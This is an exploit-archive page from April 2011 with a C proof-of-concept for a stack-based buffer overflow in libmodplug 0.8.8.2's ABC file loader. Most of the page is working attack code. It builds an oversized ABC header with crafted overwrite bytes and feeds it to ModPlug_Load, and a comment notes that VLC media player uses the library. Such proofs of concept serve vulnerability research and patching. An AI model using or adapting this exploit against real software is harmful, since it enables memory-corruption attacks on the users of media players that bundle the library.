Home / exploits libmodplug 0.8.8.2 Buffer Overflow
Posted on 29 April 2011
#include <libmodplug/modplug.h> #include <stdio.h> #include <string.h> /* libmodplug <= 0.8.8.2 .abc stack-based buffer overflow poc http://modplug-xmms.sourceforge.net/ by: epiphant this exploits one of many overflows in load_abc.cpp lol vlc media player uses libmodplug greets: defrost, babi, ming_wisher, emel1a, a.v., krs date: 28 april 2011 tested on: centos 5.6 */ int main(void) { char test[512] = "X: 1 U: "; unsigned int i; i = strlen(test); while (i < 278) test[i++] = 'Q'; test[i++] = '1' + 32; test[i++] = '3'; test[i++] = '3'; test[i++] = '4'; while (i < 286) test[i++] = 'A'; test[i++] = ' '; test[i] = '�'; strcat(test, "T: Here Without You (Transcribed by: Bungee) "); strcat(test, "Z: 3 Doors Down "); strcat(test, "L: 1/4 "); strcat(test, "Q: 108 "); strcat(test, "K: C "); strcat(test, "[A,3A3/4] [E9/8z3/8] A3/8 [c9/8z3/8] [A9/8z3/8] [E3/4z3/8] "); i = strlen(test); ModPlug_Load(test, i); return 0; }
